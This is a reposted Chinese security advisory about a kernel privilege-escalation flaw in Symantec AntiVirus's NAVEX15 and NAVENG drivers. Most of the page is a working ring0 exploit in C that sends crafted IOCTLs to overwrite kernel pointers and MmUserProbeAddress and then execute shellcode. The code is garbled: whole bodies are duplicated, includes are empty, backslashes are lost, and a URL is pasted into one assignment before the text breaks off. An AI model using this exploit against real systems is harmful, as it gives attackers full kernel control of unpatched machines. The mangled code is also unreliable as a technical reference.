作家
登录

Symantec AntiVirus IOCTL内核权限提升漏洞

作者: 来源: 2012-06-12 23:49:26 阅读 我要评论


信息提供:

安全公告(或线索)提供热线:51cto.editor@gmail.com

漏洞类别:

内存处理漏洞

攻击类型:

本地或远程攻击

发布日期:

2005-10-05

更新日期:

2005-10-08

受影响系统:

Symantec AntiVirus 所有版本

安全系统:

漏洞报告人:

rgod

漏洞描述:

Bugtraq ID: 20360

Symantec AntiVirus是非常流行的杀毒解决方案。

Symantec AntiVirus的NAVEX15.SYS和NAVENG.SYS设备驱动的IOCTL处理器没有充分地验证地址空间,允许攻击者使用常数的双字值覆盖任意内存。

如果攻击者能够向0x222AD3、0x222AD7和0x222ADB IOCTL处理器发送特制的I/O请求报文的话,就会导致以内核权限执行任意指令。

测试方法:

警告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负

////////////////////////////////////
///// Norton Internet Security
////////////////////////////////////
//// For educational purposes;
system("cls");
printf("n################################n");
printf("## Norton I.S ##n");
printf("## Ring0 Exploit ##n");
printf("################################n");
printf("nRuben Santamartanwww.reversemode.comnn");
if(argc<2)
{
printf("nusage> exploit.exe or <2K>n");
exit(1);
}
pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"),
"EnumDeviceDrivers");
pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"),
"GetDeviceDriverBaseNameA");
pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb);
devNum=cb/sizeof(LPVOID);
printf("n[!] Searching Ntoskrnl.exe Base Address...");
for(i=0;i<=devNum;i++)
{
pGetDeviceDriverBaseName(arrMods[i],baseName,MAX_PATH);
if((strncmp(baseName,"ntoskr",6)==0))
{
printf("[%x] Found!n",arrMods[i]);
BaseNt = (DWORD)arrMods[i];
BaseAuxNt = BaseNt;
}
}
if (!BaseNt)
{
printf("!!? ntoskrnl.exe base address not foundnexitingnn");
exit(0);
}
//////////////////////
///// CASE 'DosDevice'
//////////////////////
hDevice = CreateFile("\\.\NAVENG",
0,
0,
NULL,
3,
0,
0);
//////////////////////
///// INFO
//////////////////////
if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("nn** Initializing Exploit]nn");
printf("INFORMATION n");
printf("-----------------------------------------------------n");
printf("[!] NAVENG Device Handle [%x]n",hDevice);
//////////////////////
///// IOCTL
//////////////////////
OutSize = 4;
dwIOCTL = 0x222AD3;
if(strncmp(argv[1],"XP",2)==0) Ring0Addr = BaseNt + WXP_SWITCH;
else Ring0Addr = BaseNt + W2K_SWITCH;
printf("[!] Overwriting NtQuerySystemInformation Switch at [0x%x]n",Ring0Addr);
ShellAddr=(DWORD*)VirtualAlloc((LPVOID)0x2000000
,0xF000
,MEM_COMMIT|MEM_RESERVE
,PAGE_EXECUTE_READWRITE);
for(i=1;i<0x3C00;i++) ShellAddr[i]=(DWORD)ShellAddr; // paged out
memcpy((LPVOID)ShellAddr,(LPVOID)Ring0ShellCode,sizeof(Ring0ShellCode));
printf("nntt[!] Initializing Countdown,last chance to abort.");
for(i=10;i>=1;i--)
{
printf("r -[ %d ]- ",i);
if(i==1) printf("nn[*] Executing ShellCode");
Sleep(1000);
}
DeviceIoControl(hDevice,
dwIOCTL,
(LPVOID)0,0,
(LPVOID)Ring0Addr,OutSize,
&junk,
NULL);
system("dir"); // NtQuerySystemInformation Nasty Hack ;
/////////////////////
///// CLeanUp
/////////////////////
CloseHandle(hDevice);
free(ShellAddr);
printf("nn[*] Exploit terminatednn");
return 0;
}
/////////////////////////////////////////////
///// Norton Internet Security /////
/////////////////////////////////////////////
//// For educational purposes; //"PUT YOUR RING0 CODE HERE "
system("cls");
printf("n################################n");
printf("## Norton I.S ##n");
printf("## Ring0 Exploit ##n");
printf("################################n");
printf("nRuben Santamartanwww.reversemode.comnn");
if(argc<2)
{
printf("nusage> exploit.exe or <2K>n");
exit(1);
}
pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"),
"EnumDeviceDrivers");
pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"),
"GetDeviceDriverBaseNameA");
pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb);
devNum=cb/sizeof(LPVOID);
printf("n[!] Searching Ntoskrnl.exe Base Address...");
for(i=0;i<=devNum;i++)
{
pGetDeviceDriverBaseName(arrMods[i],baseName,MAX_PATH);
if((strncmp(baseName,"ntoskr",6)==0))
{
printf("[%x] Found!n",arrMods[i]);
BaseNt = (DWORD)arrMods[i];
BaseAuxNt=BaseNt;
}
}
if (!BaseNt)
{
printf("!!? ntoskrnl.exe base address not foundnexitingnn");
exit(0);
}
if(strncmp(argv[1],"XP",2)==0) InXP = TRUE;
else InXP = FALSE;
//////////////////////////////////////
////// STAGE 1
//////////////////////////////////////
if(InXP) BaseNt += WXP_USERPROBE;
else BaseNt += W2K_USERPROBE;
//////////////////////
///// CASE 'DosDevice'
//////////////////////
hDevice = CreateFile("\\.\NAVENG",
0,
0,
NULL,
3,
0,
0);
if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("nn** Initializing Exploitt[Stage 1]nn");
printf("nINFORMATION n");
printf("-----------------------------------------------------n");
printf("[!] NAVENG Device Handle [%x]n",hDevice);
//////////////////////
///// BUFFERS
//////////////////////
OutSize = 4;
OutBuff = malloc(sizeof(DWORD));
//////////////////////
///// IOCTL
//////////////////////
dwIOCTL = 0x222ADB;
DeviceIoControl(hDevice,
dwIOCTL,
(LPVOID)0,0,
(LPVOID)OutBuff,OutSize,
&junk,
NULL);
printf("[!] mmUserProbeAddress current value:t[0x7FFF0000]n");
printf("[!] Overwriting mmUserProbeAddress at:t[0x%x] n",BaseNt);
printf("[!] mmUserProbeAddress current value:t[0x%x]n",OutBuff[0]);
printf("[*] ProbeForWrite now checking for values greater than 0x%xnn",OutBuff[0]);
DeviceIoControl(hDevice,
dwIOCTL,
(LPVOID)0,0,
(LPVOID)BaseNt,OutSize,
&junk,
NULL);
mmUserProbe=OutBuff[0];
free((LPVOID)OutBuff);
CloseHandle(hDevice);
//////////////////////
///// STAGE 2
//////////////////////
BaseNt = BaseAuxNt;
/////////////////////////
printf("nn** Initializing Exploitt[Stage 2]nn");
addEx=(LPVOID)CalcJump(BaseNt,InXP,&hValue,&ShellAddr);
OutBuff=(DWORD*)VirtualAlloc((LPVOID)addEx,0xF000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if(!OutBuff) ShowError();
InBuff=OutBuff;
printf("[!] Checking Shadow Device...");
hDevice = CreateFile("\\.\shadow",
GENERIC_READ|GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
0,
NULL);
if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("[OK]n");
printf("[!] Exploiting Shadow Device...n");
while(OutBuff[3]< hValue)
{
DeviceIoControl(hDevice, // "\.shadow"
0x141043, // Privileged IOCTL
InBuff, 2, // InBuffer, InBufferSize
OutBuff, 0x18,// OutBuffer,OutBufferSize
&junk, // bytes returned
(LPOVERLAPPED) NULL);
printf("rt[->]VALUES: (%x)",OutBuff[3]);
}
if(InXP) Ring0Addr = BaseNt + WXP_EXCEPTION;
else Ring0Addr = BaseNt + W2K_EXCEPTION;
printf("n[!] Overwriting ExRaiseAccessViolation at [0x%x]...",Ring0Addr+0xC);
DeviceIoControl(hDevice, // "\.shadow"
0x141043, // Privileged IOCTL
InBuff, 2, // InBuffer, InBufferSize
(LPVOID)Ring0Addr, 0x18,// OutBuffer,OutBufferSize 0x
&junk, // bytes returned
(LPOVERLAPPED) NULL);
printf("[OK]");
printf("nntt[!] Initializing Countdown,last chance to abort.");
for(i=1;i<0x3C00;i++) OutBuff[i]=0x90909090; // paged out
memcpy((LPVOID)ShellAddr,(LPVOID)Ring0ShellCode,sizeof(Ring0ShellCode));
for(i=10;i>=1;i--)
{
printf("r -[ %d ]- ",i);
if(i==1) printf("nn[*] Executing ShellCode");
Sleep(1000);
}
DeviceIoControl(hDevice,
0x141043,
InBuff, 2,
(LPVOID)mmUserProbe+0x1000, 0x18,
&junk,
(LPOVERLAPPED) NULL);
CloseHandle(hDevice);
printf("nn[*] Exploit terminatednn");
/////////////////////
///// CLeanUp
/////////////////////
free(OutBuff);
return 0;
}
////////////////////////////////////
///// Norton Internet Security
/////////////////////////////////////////////
//// For educational purposes;
system("cls");
printf("n################################n");
printf("## Norton I.S ##n");
printf("## Ring0 Exploit ##n");
printf("################################n");
printf("nRuben Santamartanwww.reversemode.comnn");
if(argc<2)
{
printf("nusage> exploit.exe or <2K>n");
exit(1);
}
pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"),
"EnumDeviceDrivers");
pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"),
"GetDeviceDriverBaseNameA");
pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb);
devNum=cb/sizeof(LPVOID);
printf("n[!] Searching Ntoskrnl.exe Base Address...");
for(i=0;i<=devNum;i++)
{
pGetDeviceDriverBaseName(arrMods[i],baseName,MAX_PATH);
if((strncmp(baseName,"ntoskr",6)==0))
{
printf("[%x] Found!n",arrMods[i]);
BaseNt = (DWORD)arrMods[i];
BaseAuxNt = BaseNt;
}
}
if (!BaseNt)
{
printf("!!? ntoskrnl.exe base address not foundnexitingnn");
exit(0);
}
//////////////////////
///// CASE 'DosDevice'
//////////////////////
hDevice = CreateFile("\\.\NAVEX15",
0,
0,
NULL,
3,
0,
0);
//////////////////////
///// INFO
//////////////////////
if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("nn** Initializing Exploit]nn");
printf("INFORMATION n");
printf("-----------------------------------------------------n");
printf("[!] NAVEX15 Device Handle [%x]n",hDevice);
//////////////////////
///// IOCTL
//////////////////////
OutSize = 4;
dwIOCTL = 0x222AD3;
if(strncmp(argv[1],"XP",2)==0) Ring0Addr = BaseNt + WXP_SWITCH;
else Ring0Addr = BaseNt + W2K_SWITCH;
printf("[!] Overwriting NtQuerySystemInformation Switch at [0x%x]n",Ring0Addr);
ShellAddr=(DWORD*)VirtualAlloc((LPVOID)0x2000000
,0xF000
,MEM_COMMIT|MEM_RESERVE
,PAGE_EXECUTE_READWRITE);
for(i=1;i<0x3C00;i++) ShellAddr[i]=(DWORD)ShellAddr; // paged out
memcpy((LPVOID)ShellAddr,(LPVOID)Ring0ShellCode,sizeof(Ring0ShellCode));
printf("nntt[!] Initializing Countdown,last chance to abort.");
for(i=10;i>=1;i--)
{
printf("r -[ %d ]- ",i);
if(i==1) printf("nn[*] Executing ShellCode");
Sleep(1000);
}
DeviceIoControl(hDevice,
dwIOCTL,
(LPVOID)0,0,
(LPVOID)Ring0Addr,OutSize,
&junk,
NULL);
system("dir");
/////////////////////
///// CLeanUp
/////////////////////
CloseHandle(hDevice);
free(ShellAddr);
printf("nn[*] Exploit terminatednn");
return 0;
}
/////////////////////////////////////////////
///// Norton Internet Security /////
/////////////////////////////////////////////
//// For educational purposes; //"PUT YOUR RING0 CODE HERE "
system("cls");
printf("n################################n");
printf("## Norton I.S ##n");
printf("## Ring0 Exploit ##n");
printf("################################n");
printf("nRuben Santamartanwww.reversemode.comnn");
if(argc<2)
{
printf("nusage> exploit.exe or <2K>n");
exit(1);
}
pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"),
"EnumDeviceDrivers");
pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"),
"GetDeviceDriverBaseNameA");
pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb);
devNum=cb/sizeof(LPVOID);
printf("n[!] Searching Ntoskrnl.exe Base Address...");
for(i=0;i<=devNum;i++)
{
pGetDeviceDriverBaseName(arrMods[i],baseName,MAX_PATH);
if((strncmp(baseName,"ntoskr",6)==0))
{
printf("[%x] Found!n",arrMods[i]);
BaseNt = (DWORD)arrMods[i];
BaseAuxNt=BaseNt;
}
}
if (!BaseNt)
{
printf("!!? ntoskrnl.exe base address not foundnexitingnn");
exit(0);
}
if(strncmp(argv[1],"XP",2)==0) InXP = TRUE;
else InXP = FALSE;
//////////////////////////////////////
////// STAGE 1
//////////////////////////////////////
if(InXP) BaseNt += WXP_USERPROBE;
else BaseNt += W2K_USERPROBE;
//////////////////////
///// CASE 'DosDevice'
//////////////////////
hDevice = CreateFile("\\.\NAVEX15",
0,
0,
NULL,
3,
0,
0);
if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("nn** Initializing Exploitt[Stage 1]nn");
printf("nINFORMATION n");
printf("-----------------------------------------------------n");
printf("[!] NAVEX15 Device Handle [%x]n",hDevice);
//////////////////////
///// BUFFERS
//////////////////////
OutSize = 4;
OutBuff = malloc(sizeof(DWORD));
//////////////////////
///// IOCTL
//////////////////////
dwIOCTL = 0x222AD7;
DeviceIoControl(hDevice,
dwIOCTL,
(LPVOID)0,0,
(LPVOID)OutBuff,OutSize,
&junk,
NULL);
printf("[!] mmUserProbeAddress current value:t[0x7FFF0000]n");
printf("[!] Overwriting mmUserProbeAddress at:t[0x%x] n",BaseNt);
printf("[!] mmUserProbeAddress current value:t[0x%x]n",OutBuff[0]);
printf("[*] ProbeForWrite now checking for values greater than 0x%xnn",OutBuff[0]);
DeviceIoControl(hDevice,
dwIOCTL,
(LPVOID)0,0,
(LPVOID)BaseNt,OutSize,
&junk,
NULL);
mmUserProbe=OutBuff[0];
free((LPVOID)OutBuff);
CloseHandle(hDevice);
//////////////////////
///// STAGE 2
//////////////////////
BaseNt = BaseAuxNt;
/////////////////////////
printf("nn** Initializing Exploitt[Stage 2]nn");
addEx=(LPVOID)CalcJump(BaseNt,InXP,&hValue,&ShellAddr);
OutBuff=(DWORD*)VirtualAlloc((LPVOID)addEx,0xF000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if(!OutBuff) ShowError();
InBuff=OutBuff;
printf("[!] Checking Shadow Device...");
hDevice = CreateFile("\\.\shadow",
GENERIC_READ|GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
0,
NULL);
if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("[OK]n");
printf("[!] Exploiting Shadow Device...n");
while(OutBuff[3]< hValue)
{
DeviceIoControl(hDevice, // "\.shadow"
0x141043, // Privileged IOCTL
InBuff, 2, // InBuffer, InBufferSize
OutBuff, 0x18,// OutBuffer,OutBufferSize
&junk, // bytes returned
(LPOVERLAPPED) NULL);
printf("rt[->]VALUES: (%x)",OutBuff[3]);
}
if(InXP) Ring0Addr = BaseNt + WXP_EXCEPTION;
else Ring0Addr = BaseNt + W2K_EXCEPTION;
printf("n[!] Overwriting ExRaiseAccessViolation at [0x%x]...",Ring0Addr+0xC);
DeviceIoControl(hDevice, // "\.shadow"
0x141043, // Privileged IOCTL
InBuff, 2, // InBuffer, InBufferSize
(LPVOID)Ring0Addr, 0x18,// OutBuffer,OutBufferSize 0x
&junk, // bytes returned
(LPOVERLAPPED) NULL);
printf("[OK]");
printf("nntt[!] Initializing Countdown,last chance to abort.");
for(i=1;i<0x3C00;i++) OutBuff[i]=0x90909090; // paged out
memcpy((LPVOID)ShellAddr,(LPVOID)Ring0ShellCode,sizeof(Ring0ShellCode));
for(i=10;i>=1;i--)
{
printf("r -[ %d ]- ",i);
if(i==1) printf("nn[*] Executing ShellCode");
Sleep(1000);
}
DeviceIoControl(hDevice,
0x141043,
InBuff, 2,
(LPVOID)mmUserProbe+0x1000, 0x18,
&junk,
(LPOVERLAPPED) NULL);
CloseHandle(hDevice);
printf("nn[*] Exploit terminatednn");
/////////////////////
///// CLeanUp
/////////////////////
free(OutBuff);
return 0;
}
/////////////////////////////////////////////
///// Norton Internet Security /////
/////////////////////////////////////////////
//// For educational purposes ONLY
/////////////////////////////////////////////
//// Ring0 xploit
//// Rub�n Santamarta
//// www.reversemode.com
//// 26/08/2006
////////////////////////////////////
#include
#include
#define WXP_USERPROBE 0x87E34
#define W2K_USERPROBE 0x81B1C
#define WXP_EXCEPTION 0x16F120
#define W2K_EXCEPTION 0x944b6
typedef BOOL (WINAPI *PENUMDEVICES)(LPVOID*,
DWORD ,
LPDWORD);
typedef DWORD (WINAPI *PGETDEVNAME)(LPVOID ImageBase,
LPTSTR lpBaseName,
DWORD nSize);
DWORD CalcJump(DWORD BaseNt,BOOL InXP,DWORD *hValue,DWORD *ShellAddr)
{
DWORD SumTemp,IniAddress,i,sumAux,addTemp,OffWord;
if(InXP)
{
SumTemp=BaseNt+WXP_EXCEPTION+0xE;
OffWord=0x64B8;
}
else
{
SumTemp=BaseNt+W2K_EXCEPTION+0xE;
OffWord=0x5358;
}
for(i=0x4c;i<0xDDDC;i=i+4)
{
sumAux=~((i*0x10000)+OffWord);
addTemp=SumTemp-sumAux;
if(addTemp>0xE000000 && addTemp<0xF000000){
IniAddress=addTemp&0xFFFFF000;
*hValue=http://netsecurity.51cto.com/art/200610/i-4;
*ShellAddr=addTemp;
break;
&nbs

解决方法:

Symantec
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.symantec.com/


  推荐阅读

  Symantec自动支持助手ActiveX控件缓冲区溢出漏洞

信息提供:安全公告(或线索)提供热线:51cto.editor@gmail.com漏洞类别:外部输入验证漏洞攻击类型:远程攻击发布日期:2005-10-05更新日期:2005-10-08受影响系统:Symantec Norton AntiVirus 2006 Symantec N>>>详细阅读


本文标题:Symantec AntiVirus IOCTL内核权限提升漏洞

地址:http://www.17bianji.com/anquan/buding/2970.html

关键词: 探索发现

乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

网友点评
自媒体专栏

评论

热度

精彩导读
栏目ID=71的表不存在(操作类型=0)